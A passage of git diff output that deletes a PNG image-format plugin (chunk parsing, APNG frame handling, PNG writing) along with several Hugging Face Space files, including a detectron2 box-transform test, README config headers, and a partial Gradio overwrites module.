self.im_mode == "P": - self.im_palette = "RGB", s - return s - - def chunk_tRNS(self, pos, length): - # transparency - s = ImageFile._safe_read(self.fp, length) - if self.im_mode == "P": - if _simple_palette.match(s): - # tRNS contains only one full-transparent entry, - # other entries are full opaque - i = s.find(b"\0") - if i >= 0: - self.im_info["transparency"] = i - else: - # otherwise, we have a byte string with one alpha value - # for each palette entry - self.im_info["transparency"] = s - elif self.im_mode in ("1", "L", "I"): - self.im_info["transparency"] = i16(s) - elif self.im_mode == "RGB": - self.im_info["transparency"] = i16(s), i16(s, 2), i16(s, 4) - return s - - def chunk_gAMA(self, pos, length): - # gamma setting - s = ImageFile._safe_read(self.fp, length) - self.im_info["gamma"] = i32(s) / 100000.0 - return s - - def chunk_cHRM(self, pos, length): - # chromaticity, 8 unsigned ints, actual value is scaled by 100,000 - # WP x,y, Red x,y, Green x,y Blue x,y - - s = ImageFile._safe_read(self.fp, length) - raw_vals = struct.unpack(">%dI" % (len(s) // 4), s) - self.im_info["chromaticity"] = tuple(elt / 100000.0 for elt in raw_vals) - return s - - def chunk_sRGB(self, pos, length): - # srgb rendering intent, 1 byte - # 0 perceptual - # 1 relative colorimetric - # 2 saturation - # 3 absolute colorimetric - - s = ImageFile._safe_read(self.fp, length) - if length < 1: - if ImageFile.LOAD_TRUNCATED_IMAGES: - return s - msg = "Truncated sRGB chunk" - raise ValueError(msg) - self.im_info["srgb"] = s[0] - return s - - def chunk_pHYs(self, pos, length): - # pixels per unit - s = ImageFile._safe_read(self.fp, length) - if length < 9: - if ImageFile.LOAD_TRUNCATED_IMAGES: - return s - msg = "Truncated pHYs chunk" - raise ValueError(msg) - px, py = i32(s, 0), i32(s, 4) - unit = s[8] - if unit == 1: # meter - dpi = px * 0.0254, py * 0.0254 - self.im_info["dpi"] = dpi - elif unit == 0: - self.im_info["aspect"] = px, py - return s - - def chunk_tEXt(self, pos, length): - # text - s = ImageFile._safe_read(self.fp, length) - try: - k, v = s.split(b"\0", 1) - except ValueError: - # fallback for broken tEXt tags - k = s - v = b"" - if k: - k = k.decode("latin-1", "strict") - v_str = v.decode("latin-1", "replace") - - self.im_info[k] = v if k == "exif" else v_str - self.im_text[k] = v_str - self.check_text_memory(len(v_str)) - - return s - - def chunk_zTXt(self, pos, length): - # compressed text - s = ImageFile._safe_read(self.fp, length) - try: - k, v = s.split(b"\0", 1) - except ValueError: - k = s - v = b"" - if v: - comp_method = v[0] - else: - comp_method = 0 - if comp_method != 0: - msg = f"Unknown compression method {comp_method} in zTXt chunk" - raise SyntaxError(msg) - try: - v = _safe_zlib_decompress(v[1:]) - except ValueError: - if ImageFile.LOAD_TRUNCATED_IMAGES: - v = b"" - else: - raise - except zlib.error: - v = b"" - - if k: - k = k.decode("latin-1", "strict") - v = v.decode("latin-1", "replace") - - self.im_info[k] = self.im_text[k] = v - self.check_text_memory(len(v)) - - return s - - def chunk_iTXt(self, pos, length): - # international text - r = s = ImageFile._safe_read(self.fp, length) - try: - k, r = r.split(b"\0", 1) - except ValueError: - return s - if len(r) < 2: - return s - cf, cm, r = r[0], r[1], r[2:] - try: - lang, tk, v = r.split(b"\0", 2) - except ValueError: - return s - if cf != 0: - if cm == 0: - try: - v = _safe_zlib_decompress(v) - except ValueError: - if ImageFile.LOAD_TRUNCATED_IMAGES: - return s - else: - raise - except zlib.error: - return s - else: - return 
s - try: - k = k.decode("latin-1", "strict") - lang = lang.decode("utf-8", "strict") - tk = tk.decode("utf-8", "strict") - v = v.decode("utf-8", "strict") - except UnicodeError: - return s - - self.im_info[k] = self.im_text[k] = iTXt(v, lang, tk) - self.check_text_memory(len(v)) - - return s - - def chunk_eXIf(self, pos, length): - s = ImageFile._safe_read(self.fp, length) - self.im_info["exif"] = b"Exif\x00\x00" + s - return s - - # APNG chunks - def chunk_acTL(self, pos, length): - s = ImageFile._safe_read(self.fp, length) - if length < 8: - if ImageFile.LOAD_TRUNCATED_IMAGES: - return s - msg = "APNG contains truncated acTL chunk" - raise ValueError(msg) - if self.im_n_frames is not None: - self.im_n_frames = None - warnings.warn("Invalid APNG, will use default PNG image if possible") - return s - n_frames = i32(s) - if n_frames == 0 or n_frames > 0x80000000: - warnings.warn("Invalid APNG, will use default PNG image if possible") - return s - self.im_n_frames = n_frames - self.im_info["loop"] = i32(s, 4) - self.im_custom_mimetype = "image/apng" - return s - - def chunk_fcTL(self, pos, length): - s = ImageFile._safe_read(self.fp, length) - if length < 26: - if ImageFile.LOAD_TRUNCATED_IMAGES: - return s - msg = "APNG contains truncated fcTL chunk" - raise ValueError(msg) - seq = i32(s) - if (self._seq_num is None and seq != 0) or ( - self._seq_num is not None and self._seq_num != seq - 1 - ): - msg = "APNG contains frame sequence errors" - raise SyntaxError(msg) - self._seq_num = seq - width, height = i32(s, 4), i32(s, 8) - px, py = i32(s, 12), i32(s, 16) - im_w, im_h = self.im_size - if px + width > im_w or py + height > im_h: - msg = "APNG contains invalid frames" - raise SyntaxError(msg) - self.im_info["bbox"] = (px, py, px + width, py + height) - delay_num, delay_den = i16(s, 20), i16(s, 22) - if delay_den == 0: - delay_den = 100 - self.im_info["duration"] = float(delay_num) / float(delay_den) * 1000 - self.im_info["disposal"] = s[24] - self.im_info["blend"] = s[25] - return s - - def chunk_fdAT(self, pos, length): - if length < 4: - if ImageFile.LOAD_TRUNCATED_IMAGES: - s = ImageFile._safe_read(self.fp, length) - return s - msg = "APNG contains truncated fDAT chunk" - raise ValueError(msg) - s = ImageFile._safe_read(self.fp, 4) - seq = i32(s) - if self._seq_num != seq - 1: - msg = "APNG contains frame sequence errors" - raise SyntaxError(msg) - self._seq_num = seq - return self.chunk_IDAT(pos + 4, length - 4) - - -# -------------------------------------------------------------------- -# PNG reader - - -def _accept(prefix): - return prefix[:8] == _MAGIC - - -## -# Image plugin for PNG images. - - -class PngImageFile(ImageFile.ImageFile): - format = "PNG" - format_description = "Portable network graphics" - - def _open(self): - if not _accept(self.fp.read(8)): - msg = "not a PNG file" - raise SyntaxError(msg) - self._fp = self.fp - self.__frame = 0 - - # - # Parse headers up to the first IDAT or fDAT chunk - - self.private_chunks = [] - self.png = PngStream(self.fp) - - while True: - # - # get next chunk - - cid, pos, length = self.png.read() - - try: - s = self.png.call(cid, pos, length) - except EOFError: - break - except AttributeError: - logger.debug("%r %s %s (unknown)", cid, pos, length) - s = ImageFile._safe_read(self.fp, length) - if cid[1:2].islower(): - self.private_chunks.append((cid, s)) - - self.png.crc(cid, s) - - # - # Copy relevant attributes from the PngStream. 
An alternative - # would be to let the PngStream class modify these attributes - # directly, but that introduces circular references which are - # difficult to break if things go wrong in the decoder... - # (believe me, I've tried ;-) - - self.mode = self.png.im_mode - self._size = self.png.im_size - self.info = self.png.im_info - self._text = None - self.tile = self.png.im_tile - self.custom_mimetype = self.png.im_custom_mimetype - self.n_frames = self.png.im_n_frames or 1 - self.default_image = self.info.get("default_image", False) - - if self.png.im_palette: - rawmode, data = self.png.im_palette - self.palette = ImagePalette.raw(rawmode, data) - - if cid == b"fdAT": - self.__prepare_idat = length - 4 - else: - self.__prepare_idat = length # used by load_prepare() - - if self.png.im_n_frames is not None: - self._close_exclusive_fp_after_loading = False - self.png.save_rewind() - self.__rewind_idat = self.__prepare_idat - self.__rewind = self._fp.tell() - if self.default_image: - # IDAT chunk contains default image and not first animation frame - self.n_frames += 1 - self._seek(0) - self.is_animated = self.n_frames > 1 - - @property - def text(self): - # experimental - if self._text is None: - # iTxt, tEXt and zTXt chunks may appear at the end of the file - # So load the file to ensure that they are read - if self.is_animated: - frame = self.__frame - # for APNG, seek to the final frame before loading - self.seek(self.n_frames - 1) - self.load() - if self.is_animated: - self.seek(frame) - return self._text - - def verify(self): - """Verify PNG file""" - - if self.fp is None: - msg = "verify must be called directly after open" - raise RuntimeError(msg) - - # back up to beginning of IDAT block - self.fp.seek(self.tile[0][2] - 8) - - self.png.verify() - self.png.close() - - if self._exclusive_fp: - self.fp.close() - self.fp = None - - def seek(self, frame): - if not self._seek_check(frame): - return - if frame < self.__frame: - self._seek(0, True) - - last_frame = self.__frame - for f in range(self.__frame + 1, frame + 1): - try: - self._seek(f) - except EOFError as e: - self.seek(last_frame) - msg = "no more images in APNG file" - raise EOFError(msg) from e - - def _seek(self, frame, rewind=False): - if frame == 0: - if rewind: - self._fp.seek(self.__rewind) - self.png.rewind() - self.__prepare_idat = self.__rewind_idat - self.im = None - if self.pyaccess: - self.pyaccess = None - self.info = self.png.im_info - self.tile = self.png.im_tile - self.fp = self._fp - self._prev_im = None - self.dispose = None - self.default_image = self.info.get("default_image", False) - self.dispose_op = self.info.get("disposal") - self.blend_op = self.info.get("blend") - self.dispose_extent = self.info.get("bbox") - self.__frame = 0 - else: - if frame != self.__frame + 1: - msg = f"cannot seek to frame {frame}" - raise ValueError(msg) - - # ensure previous frame was loaded - self.load() - - if self.dispose: - self.im.paste(self.dispose, self.dispose_extent) - self._prev_im = self.im.copy() - - self.fp = self._fp - - # advance to the next frame - if self.__prepare_idat: - ImageFile._safe_read(self.fp, self.__prepare_idat) - self.__prepare_idat = 0 - frame_start = False - while True: - self.fp.read(4) # CRC - - try: - cid, pos, length = self.png.read() - except (struct.error, SyntaxError): - break - - if cid == b"IEND": - msg = "No more images in APNG file" - raise EOFError(msg) - if cid == b"fcTL": - if frame_start: - # there must be at least one fdAT chunk between fcTL chunks - msg = "APNG missing frame data" 
- raise SyntaxError(msg) - frame_start = True - - try: - self.png.call(cid, pos, length) - except UnicodeDecodeError: - break - except EOFError: - if cid == b"fdAT": - length -= 4 - if frame_start: - self.__prepare_idat = length - break - ImageFile._safe_read(self.fp, length) - except AttributeError: - logger.debug("%r %s %s (unknown)", cid, pos, length) - ImageFile._safe_read(self.fp, length) - - self.__frame = frame - self.tile = self.png.im_tile - self.dispose_op = self.info.get("disposal") - self.blend_op = self.info.get("blend") - self.dispose_extent = self.info.get("bbox") - - if not self.tile: - raise EOFError - - # setup frame disposal (actual disposal done when needed in the next _seek()) - if self._prev_im is None and self.dispose_op == Disposal.OP_PREVIOUS: - self.dispose_op = Disposal.OP_BACKGROUND - - if self.dispose_op == Disposal.OP_PREVIOUS: - self.dispose = self._prev_im.copy() - self.dispose = self._crop(self.dispose, self.dispose_extent) - elif self.dispose_op == Disposal.OP_BACKGROUND: - self.dispose = Image.core.fill(self.mode, self.size) - self.dispose = self._crop(self.dispose, self.dispose_extent) - else: - self.dispose = None - - def tell(self): - return self.__frame - - def load_prepare(self): - """internal: prepare to read PNG file""" - - if self.info.get("interlace"): - self.decoderconfig = self.decoderconfig + (1,) - - self.__idat = self.__prepare_idat # used by load_read() - ImageFile.ImageFile.load_prepare(self) - - def load_read(self, read_bytes): - """internal: read more image data""" - - while self.__idat == 0: - # end of chunk, skip forward to next one - - self.fp.read(4) # CRC - - cid, pos, length = self.png.read() - - if cid not in [b"IDAT", b"DDAT", b"fdAT"]: - self.png.push(cid, pos, length) - return b"" - - if cid == b"fdAT": - try: - self.png.call(cid, pos, length) - except EOFError: - pass - self.__idat = length - 4 # sequence_num has already been read - else: - self.__idat = length # empty chunks are allowed - - # read more data from this chunk - if read_bytes <= 0: - read_bytes = self.__idat - else: - read_bytes = min(read_bytes, self.__idat) - - self.__idat = self.__idat - read_bytes - - return self.fp.read(read_bytes) - - def load_end(self): - """internal: finished reading image data""" - if self.__idat != 0: - self.fp.read(self.__idat) - while True: - self.fp.read(4) # CRC - - try: - cid, pos, length = self.png.read() - except (struct.error, SyntaxError): - break - - if cid == b"IEND": - break - elif cid == b"fcTL" and self.is_animated: - # start of the next frame, stop reading - self.__prepare_idat = 0 - self.png.push(cid, pos, length) - break - - try: - self.png.call(cid, pos, length) - except UnicodeDecodeError: - break - except EOFError: - if cid == b"fdAT": - length -= 4 - ImageFile._safe_read(self.fp, length) - except AttributeError: - logger.debug("%r %s %s (unknown)", cid, pos, length) - s = ImageFile._safe_read(self.fp, length) - if cid[1:2].islower(): - self.private_chunks.append((cid, s, True)) - self._text = self.png.im_text - if not self.is_animated: - self.png.close() - self.png = None - else: - if self._prev_im and self.blend_op == Blend.OP_OVER: - updated = self._crop(self.im, self.dispose_extent) - if self.im.mode == "RGB" and "transparency" in self.info: - mask = updated.convert_transparent( - "RGBA", self.info["transparency"] - ) - else: - mask = updated.convert("RGBA") - self._prev_im.paste(updated, self.dispose_extent, mask) - self.im = self._prev_im - if self.pyaccess: - self.pyaccess = None - - def _getexif(self): - if 
"exif" not in self.info: - self.load() - if "exif" not in self.info and "Raw profile type exif" not in self.info: - return None - return self.getexif()._get_merged_dict() - - def getexif(self): - if "exif" not in self.info: - self.load() - - return super().getexif() - - def getxmp(self): - """ - Returns a dictionary containing the XMP tags. - Requires defusedxml to be installed. - - :returns: XMP tags in a dictionary. - """ - return ( - self._getxmp(self.info["XML:com.adobe.xmp"]) - if "XML:com.adobe.xmp" in self.info - else {} - ) - - -# -------------------------------------------------------------------- -# PNG writer - -_OUTMODES = { - # supported PIL modes, and corresponding rawmodes/bits/color combinations - "1": ("1", b"\x01\x00"), - "L;1": ("L;1", b"\x01\x00"), - "L;2": ("L;2", b"\x02\x00"), - "L;4": ("L;4", b"\x04\x00"), - "L": ("L", b"\x08\x00"), - "LA": ("LA", b"\x08\x04"), - "I": ("I;16B", b"\x10\x00"), - "I;16": ("I;16B", b"\x10\x00"), - "P;1": ("P;1", b"\x01\x03"), - "P;2": ("P;2", b"\x02\x03"), - "P;4": ("P;4", b"\x04\x03"), - "P": ("P", b"\x08\x03"), - "RGB": ("RGB", b"\x08\x02"), - "RGBA": ("RGBA", b"\x08\x06"), -} - - -def putchunk(fp, cid, *data): - """Write a PNG chunk (including CRC field)""" - - data = b"".join(data) - - fp.write(o32(len(data)) + cid) - fp.write(data) - crc = _crc32(data, _crc32(cid)) - fp.write(o32(crc)) - - -class _idat: - # wrap output from the encoder in IDAT chunks - - def __init__(self, fp, chunk): - self.fp = fp - self.chunk = chunk - - def write(self, data): - self.chunk(self.fp, b"IDAT", data) - - -class _fdat: - # wrap encoder output in fdAT chunks - - def __init__(self, fp, chunk, seq_num): - self.fp = fp - self.chunk = chunk - self.seq_num = seq_num - - def write(self, data): - self.chunk(self.fp, b"fdAT", o32(self.seq_num), data) - self.seq_num += 1 - - -def _write_multiple_frames(im, fp, chunk, rawmode, default_image, append_images): - duration = im.encoderinfo.get("duration", im.info.get("duration", 0)) - loop = im.encoderinfo.get("loop", im.info.get("loop", 0)) - disposal = im.encoderinfo.get("disposal", im.info.get("disposal", Disposal.OP_NONE)) - blend = im.encoderinfo.get("blend", im.info.get("blend", Blend.OP_SOURCE)) - - if default_image: - chain = itertools.chain(append_images) - else: - chain = itertools.chain([im], append_images) - - im_frames = [] - frame_count = 0 - for im_seq in chain: - for im_frame in ImageSequence.Iterator(im_seq): - if im_frame.mode == rawmode: - im_frame = im_frame.copy() - else: - if rawmode == "P": - im_frame = im_frame.convert(rawmode, palette=im.palette) - else: - im_frame = im_frame.convert(rawmode) - encoderinfo = im.encoderinfo.copy() - if isinstance(duration, (list, tuple)): - encoderinfo["duration"] = duration[frame_count] - if isinstance(disposal, (list, tuple)): - encoderinfo["disposal"] = disposal[frame_count] - if isinstance(blend, (list, tuple)): - encoderinfo["blend"] = blend[frame_count] - frame_count += 1 - - if im_frames: - previous = im_frames[-1] - prev_disposal = previous["encoderinfo"].get("disposal") - prev_blend = previous["encoderinfo"].get("blend") - if prev_disposal == Disposal.OP_PREVIOUS and len(im_frames) < 2: - prev_disposal = Disposal.OP_BACKGROUND - - if prev_disposal == Disposal.OP_BACKGROUND: - base_im = previous["im"].copy() - dispose = Image.core.fill("RGBA", im.size, (0, 0, 0, 0)) - bbox = previous["bbox"] - if bbox: - dispose = dispose.crop(bbox) - else: - bbox = (0, 0) + im.size - base_im.paste(dispose, bbox) - elif prev_disposal == Disposal.OP_PREVIOUS: - base_im 
= im_frames[-2]["im"] - else: - base_im = previous["im"] - delta = ImageChops.subtract_modulo( - im_frame.convert("RGBA"), base_im.convert("RGBA") - ) - bbox = delta.getbbox(alpha_only=False) - if ( - not bbox - and prev_disposal == encoderinfo.get("disposal") - and prev_blend == encoderinfo.get("blend") - ): - previous["encoderinfo"]["duration"] += encoderinfo.get( - "duration", duration - ) - continue - else: - bbox = None - if "duration" not in encoderinfo: - encoderinfo["duration"] = duration - im_frames.append({"im": im_frame, "bbox": bbox, "encoderinfo": encoderinfo}) - - # animation control - chunk( - fp, - b"acTL", - o32(len(im_frames)), # 0: num_frames - o32(loop), # 4: num_plays - ) - - # default image IDAT (if it exists) - if default_image: - ImageFile._save(im, _idat(fp, chunk), [("zip", (0, 0) + im.size, 0, rawmode)]) - - seq_num = 0 - for frame, frame_data in enumerate(im_frames): - im_frame = frame_data["im"] - if not frame_data["bbox"]: - bbox = (0, 0) + im_frame.size - else: - bbox = frame_data["bbox"] - im_frame = im_frame.crop(bbox) - size = im_frame.size - encoderinfo = frame_data["encoderinfo"] - frame_duration = int(round(encoderinfo["duration"])) - frame_disposal = encoderinfo.get("disposal", disposal) - frame_blend = encoderinfo.get("blend", blend) - # frame control - chunk( - fp, - b"fcTL", - o32(seq_num), # sequence_number - o32(size[0]), # width - o32(size[1]), # height - o32(bbox[0]), # x_offset - o32(bbox[1]), # y_offset - o16(frame_duration), # delay_numerator - o16(1000), # delay_denominator - o8(frame_disposal), # dispose_op - o8(frame_blend), # blend_op - ) - seq_num += 1 - # frame data - if frame == 0 and not default_image: - # first frame must be in IDAT chunks for backwards compatibility - ImageFile._save( - im_frame, - _idat(fp, chunk), - [("zip", (0, 0) + im_frame.size, 0, rawmode)], - ) - else: - fdat_chunks = _fdat(fp, chunk, seq_num) - ImageFile._save( - im_frame, - fdat_chunks, - [("zip", (0, 0) + im_frame.size, 0, rawmode)], - ) - seq_num = fdat_chunks.seq_num - - -def _save_all(im, fp, filename): - _save(im, fp, filename, save_all=True) - - -def _save(im, fp, filename, chunk=putchunk, save_all=False): - # save an image to disk (called by the save method) - - if save_all: - default_image = im.encoderinfo.get( - "default_image", im.info.get("default_image") - ) - modes = set() - append_images = im.encoderinfo.get("append_images", []) - if default_image: - chain = itertools.chain(append_images) - else: - chain = itertools.chain([im], append_images) - for im_seq in chain: - for im_frame in ImageSequence.Iterator(im_seq): - modes.add(im_frame.mode) - for mode in ("RGBA", "RGB", "P"): - if mode in modes: - break - else: - mode = modes.pop() - else: - mode = im.mode - - if mode == "P": - # - # attempt to minimize storage requirements for palette images - if "bits" in im.encoderinfo: - # number of bits specified by user - colors = min(1 << im.encoderinfo["bits"], 256) - else: - # check palette contents - if im.palette: - colors = max(min(len(im.palette.getdata()[1]) // 3, 256), 1) - else: - colors = 256 - - if colors <= 16: - if colors <= 2: - bits = 1 - elif colors <= 4: - bits = 2 - else: - bits = 4 - mode = f"{mode};{bits}" - - # encoder options - im.encoderconfig = ( - im.encoderinfo.get("optimize", False), - im.encoderinfo.get("compress_level", -1), - im.encoderinfo.get("compress_type", -1), - im.encoderinfo.get("dictionary", b""), - ) - - # get the corresponding PNG mode - try: - rawmode, mode = _OUTMODES[mode] - except KeyError as e: - msg = 
f"cannot write mode {mode} as PNG" - raise OSError(msg) from e - - # - # write minimal PNG file - - fp.write(_MAGIC) - - chunk( - fp, - b"IHDR", - o32(im.size[0]), # 0: size - o32(im.size[1]), - mode, # 8: depth/type - b"\0", # 10: compression - b"\0", # 11: filter category - b"\0", # 12: interlace flag - ) - - chunks = [b"cHRM", b"gAMA", b"sBIT", b"sRGB", b"tIME"] - - icc = im.encoderinfo.get("icc_profile", im.info.get("icc_profile")) - if icc: - # ICC profile - # according to PNG spec, the iCCP chunk contains: - # Profile name 1-79 bytes (character string) - # Null separator 1 byte (null character) - # Compression method 1 byte (0) - # Compressed profile n bytes (zlib with deflate compression) - name = b"ICC Profile" - data = name + b"\0\0" + zlib.compress(icc) - chunk(fp, b"iCCP", data) - - # You must either have sRGB or iCCP. - # Disallow sRGB chunks when an iCCP-chunk has been emitted. - chunks.remove(b"sRGB") - - info = im.encoderinfo.get("pnginfo") - if info: - chunks_multiple_allowed = [b"sPLT", b"iTXt", b"tEXt", b"zTXt"] - for info_chunk in info.chunks: - cid, data = info_chunk[:2] - if cid in chunks: - chunks.remove(cid) - chunk(fp, cid, data) - elif cid in chunks_multiple_allowed: - chunk(fp, cid, data) - elif cid[1:2].islower(): - # Private chunk - after_idat = info_chunk[2:3] - if not after_idat: - chunk(fp, cid, data) - - if im.mode == "P": - palette_byte_number = colors * 3 - palette_bytes = im.im.getpalette("RGB")[:palette_byte_number] - while len(palette_bytes) < palette_byte_number: - palette_bytes += b"\0" - chunk(fp, b"PLTE", palette_bytes) - - transparency = im.encoderinfo.get("transparency", im.info.get("transparency", None)) - - if transparency or transparency == 0: - if im.mode == "P": - # limit to actual palette size - alpha_bytes = colors - if isinstance(transparency, bytes): - chunk(fp, b"tRNS", transparency[:alpha_bytes]) - else: - transparency = max(0, min(255, transparency)) - alpha = b"\xFF" * transparency + b"\0" - chunk(fp, b"tRNS", alpha[:alpha_bytes]) - elif im.mode in ("1", "L", "I"): - transparency = max(0, min(65535, transparency)) - chunk(fp, b"tRNS", o16(transparency)) - elif im.mode == "RGB": - red, green, blue = transparency - chunk(fp, b"tRNS", o16(red) + o16(green) + o16(blue)) - else: - if "transparency" in im.encoderinfo: - # don't bother with transparency if it's an RGBA - # and it's in the info dict. It's probably just stale. 
- msg = "cannot use transparency for this mode" - raise OSError(msg) - else: - if im.mode == "P" and im.im.getpalettemode() == "RGBA": - alpha = im.im.getpalette("RGBA", "A") - alpha_bytes = colors - chunk(fp, b"tRNS", alpha[:alpha_bytes]) - - dpi = im.encoderinfo.get("dpi") - if dpi: - chunk( - fp, - b"pHYs", - o32(int(dpi[0] / 0.0254 + 0.5)), - o32(int(dpi[1] / 0.0254 + 0.5)), - b"\x01", - ) - - if info: - chunks = [b"bKGD", b"hIST"] - for info_chunk in info.chunks: - cid, data = info_chunk[:2] - if cid in chunks: - chunks.remove(cid) - chunk(fp, cid, data) - - exif = im.encoderinfo.get("exif") - if exif: - if isinstance(exif, Image.Exif): - exif = exif.tobytes(8) - if exif.startswith(b"Exif\x00\x00"): - exif = exif[6:] - chunk(fp, b"eXIf", exif) - - if save_all: - _write_multiple_frames(im, fp, chunk, rawmode, default_image, append_images) - else: - ImageFile._save(im, _idat(fp, chunk), [("zip", (0, 0) + im.size, 0, rawmode)]) - - if info: - for info_chunk in info.chunks: - cid, data = info_chunk[:2] - if cid[1:2].islower(): - # Private chunk - after_idat = info_chunk[2:3] - if after_idat: - chunk(fp, cid, data) - - chunk(fp, b"IEND", b"") - - if hasattr(fp, "flush"): - fp.flush() - - -# -------------------------------------------------------------------- -# PNG chunk converter - - -def getchunks(im, **params): - """Return a list of PNG chunks representing this image.""" - - class collector: - data = [] - - def write(self, data): - pass - - def append(self, chunk): - self.data.append(chunk) - - def append(fp, cid, *data): - data = b"".join(data) - crc = o32(_crc32(data, _crc32(cid))) - fp.append((cid, data, crc)) - - fp = collector() - - try: - im.encoderinfo = params - _save(im, fp, None, append) - finally: - del im.encoderinfo - - return fp.data - - -# -------------------------------------------------------------------- -# Registry - -Image.register_open(PngImageFile.format, PngImageFile, _accept) -Image.register_save(PngImageFile.format, _save) -Image.register_save_all(PngImageFile.format, _save_all) - -Image.register_extensions(PngImageFile.format, [".png", ".apng"]) - -Image.register_mime(PngImageFile.format, "image/png") diff --git a/spaces/carlosalonso/Detection-video/carpeta_deteccion/tests/modeling/test_box2box_transform.py b/spaces/carlosalonso/Detection-video/carpeta_deteccion/tests/modeling/test_box2box_transform.py deleted file mode 100644 index fd3a7b79b6b7a3608ad7cb3918de020a5a600d2f..0000000000000000000000000000000000000000 --- a/spaces/carlosalonso/Detection-video/carpeta_deteccion/tests/modeling/test_box2box_transform.py +++ /dev/null @@ -1,94 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. 
-import logging -import unittest -import torch - -from detectron2.modeling.box_regression import ( - Box2BoxTransform, - Box2BoxTransformLinear, - Box2BoxTransformRotated, -) -from detectron2.utils.testing import random_boxes - -logger = logging.getLogger(__name__) - - -class TestBox2BoxTransform(unittest.TestCase): - def test_reconstruction(self): - weights = (5, 5, 10, 10) - b2b_tfm = Box2BoxTransform(weights=weights) - src_boxes = random_boxes(10) - dst_boxes = random_boxes(10) - - devices = [torch.device("cpu")] - if torch.cuda.is_available(): - devices.append(torch.device("cuda")) - for device in devices: - src_boxes = src_boxes.to(device=device) - dst_boxes = dst_boxes.to(device=device) - deltas = b2b_tfm.get_deltas(src_boxes, dst_boxes) - dst_boxes_reconstructed = b2b_tfm.apply_deltas(deltas, src_boxes) - self.assertTrue(torch.allclose(dst_boxes, dst_boxes_reconstructed)) - - def test_apply_deltas_tracing(self): - weights = (5, 5, 10, 10) - b2b_tfm = Box2BoxTransform(weights=weights) - - with torch.no_grad(): - func = torch.jit.trace(b2b_tfm.apply_deltas, (torch.randn(10, 20), torch.randn(10, 4))) - - o = func(torch.randn(10, 20), torch.randn(10, 4)) - self.assertEqual(o.shape, (10, 20)) - o = func(torch.randn(5, 20), torch.randn(5, 4)) - self.assertEqual(o.shape, (5, 20)) - - -def random_rotated_boxes(mean_box, std_length, std_angle, N): - return torch.cat( - [torch.rand(N, 4) * std_length, torch.rand(N, 1) * std_angle], dim=1 - ) + torch.tensor(mean_box, dtype=torch.float) - - -class TestBox2BoxTransformRotated(unittest.TestCase): - def test_reconstruction(self): - weights = (5, 5, 10, 10, 1) - b2b_transform = Box2BoxTransformRotated(weights=weights) - src_boxes = random_rotated_boxes([10, 10, 20, 20, -30], 5, 60.0, 10) - dst_boxes = random_rotated_boxes([10, 10, 20, 20, -30], 5, 60.0, 10) - - devices = [torch.device("cpu")] - if torch.cuda.is_available(): - devices.append(torch.device("cuda")) - for device in devices: - src_boxes = src_boxes.to(device=device) - dst_boxes = dst_boxes.to(device=device) - deltas = b2b_transform.get_deltas(src_boxes, dst_boxes) - dst_boxes_reconstructed = b2b_transform.apply_deltas(deltas, src_boxes) - assert torch.allclose(dst_boxes[:, :4], dst_boxes_reconstructed[:, :4], atol=1e-5) - # angle difference has to be normalized - assert torch.allclose( - (dst_boxes[:, 4] - dst_boxes_reconstructed[:, 4] + 180.0) % 360.0 - 180.0, - torch.zeros_like(dst_boxes[:, 4]), - atol=1e-4, - ) - - -class TestBox2BoxTransformLinear(unittest.TestCase): - def test_reconstruction(self): - b2b_tfm = Box2BoxTransformLinear() - src_boxes = random_boxes(10) - dst_boxes = torch.tensor([0, 0, 101, 101] * 10).reshape(10, 4).float() - - devices = [torch.device("cpu")] - if torch.cuda.is_available(): - devices.append(torch.device("cuda")) - for device in devices: - src_boxes = src_boxes.to(device=device) - dst_boxes = dst_boxes.to(device=device) - deltas = b2b_tfm.get_deltas(src_boxes, dst_boxes) - dst_boxes_reconstructed = b2b_tfm.apply_deltas(deltas, src_boxes) - self.assertTrue(torch.allclose(dst_boxes, dst_boxes_reconstructed, atol=1e-3)) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/cchuang2009/CO2/README.md b/spaces/cchuang2009/CO2/README.md deleted file mode 100644 index eca6fcbb60ca262d56b2230201e657c11954b8c5..0000000000000000000000000000000000000000 --- a/spaces/cchuang2009/CO2/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: CO2 -emoji: ⚡ -colorFrom: gray -colorTo: blue -sdk: streamlit -sdk_version: 1.19.0 -app_file: app.py -pinned: false 
-license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/chcomet/cholec80-position-encoder/README.md b/spaces/chcomet/cholec80-position-encoder/README.md deleted file mode 100644 index c15703ad4c641d3f37a94db4e521b651b22728cb..0000000000000000000000000000000000000000 --- a/spaces/chcomet/cholec80-position-encoder/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Cholec80 Position Encoder -emoji: 🌍 -colorFrom: blue -colorTo: red -sdk: gradio -sdk_version: 3.3.1 -app_file: app.py -pinned: false -license: afl-3.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/chenxx/ChuanhuChatGPT/overwrites.py b/spaces/chenxx/ChuanhuChatGPT/overwrites.py deleted file mode 100644 index a87499a81bb3c23bf34c1faadcc02085567cd447..0000000000000000000000000000000000000000 --- a/spaces/chenxx/ChuanhuChatGPT/overwrites.py +++ /dev/null @@ -1,55 +0,0 @@ -from __future__ import annotations -import logging - -from llama_index import Prompt -from typing import List, Tuple -import mdtex2html - -from presets import * -from llama_func import * - - -def compact_text_chunks(self, prompt: Prompt, text_chunks: List[str]) -> List[str]: - logging.debug("Compacting text chunks...🚀🚀🚀") - combined_str = [c.strip() for c in text_chunks if c.strip()] - combined_str = [f"[{index+1}] {c}" for index, c in enumerate(combined_str)] - combined_str = "\n\n".join(combined_str) - # resplit based on self.max_chunk_overlap - text_splitter = self.get_text_splitter_given_prompt(prompt, 1, padding=1) - return text_splitter.split_text(combined_str) - - -def postprocess( - self, y: List[Tuple[str | None, str | None]] -) -> List[Tuple[str | None, str | None]]: - """ - Parameters: - y: List of tuples representing the message and response pairs. Each message and response should be a string, which may be in Markdown format. - Returns: - List of tuples representing the message and response. Each message and response will be a string of HTML. 
